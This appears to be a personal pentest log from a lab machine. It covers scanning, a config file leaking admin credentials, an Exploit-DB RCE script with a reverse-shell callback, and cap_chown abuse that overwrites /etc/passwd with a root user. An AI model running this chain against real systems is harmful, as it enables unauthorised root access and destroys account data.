Quick
๐งช Pentest Log: {{date:2025-08-26}}
๐ Target Information
- Machine Name: Quick
- IP Address: 10.11.1.20
- Operating System: Linux
ip=10.11.1.20
๐ก Enumeration
๐ Port Scanning
Command Used
ports=$(nmap -p- --min-rate=1000 -T4 $ip | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
nmap -p$ports -sC -sV $ip -oN tcp_scan_result.txt
nmap -sU --top-ports 100 $ip -oN udp_scan_result.txt
Port 22
Port 80
Web Content Enumeration
gobuster dir -u http://$ip -w /usr/share/seclists/Discovery/Web-Content/common.txt
dirsearch -u http://$ip -r -o dirsearch.txt
wpscan --url http://$ip
Found txt config file under databse folder
http://10.11.1.20/database/config.php.txt
$config['login_email'] = "admin@localhost.local";
$config['login_pass'] = "admin123";
๐ฃ Exploitation
๐ Vulnerability Summary
- Service / Port: 80
- Vulnerability Type: RCE
๐ Exploit Execution
๐ง Exploit Method
Tool / Script Used:
https://www.exploit-db.com/exploits/49494
python3 49494.py http://$ip/admin.php/ admin@localhost.local admin123 172.16.1.2 80
python3 /home/kali/Documents/oscp/Shell\ Handler/penelope/penelope.py -p 80
๐งฌ Privilege Escalation
๐ค Current Access
- User: www-data
- Groups: 33(www-data)
- Shell Type: reverse shell
๐ Enumeration
Binary Capabilities:
getcap -r / 2>/dev/null
found
/usr/bin/python3.8 = cap_chown+ep
๐ Privilege Escalation Exploit
๐ Exploit Summary
- Technique Used: Linux Capability Abuse
- Target Binary/Service: Python3
- Reference / Source: https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/linux-capabilities.html#cap_chown
๐ง Exploit Steps
- Setup
python3 -c 'import os;os.chown("/etc/passwd",33,33)'
echo 'tony:$1$test$28Tmd0tsvqI1Eq.TDxcaq/:0:0:tony,,,:/root:/bin/bash' > /etc/passwd;
- Smash to root
su tony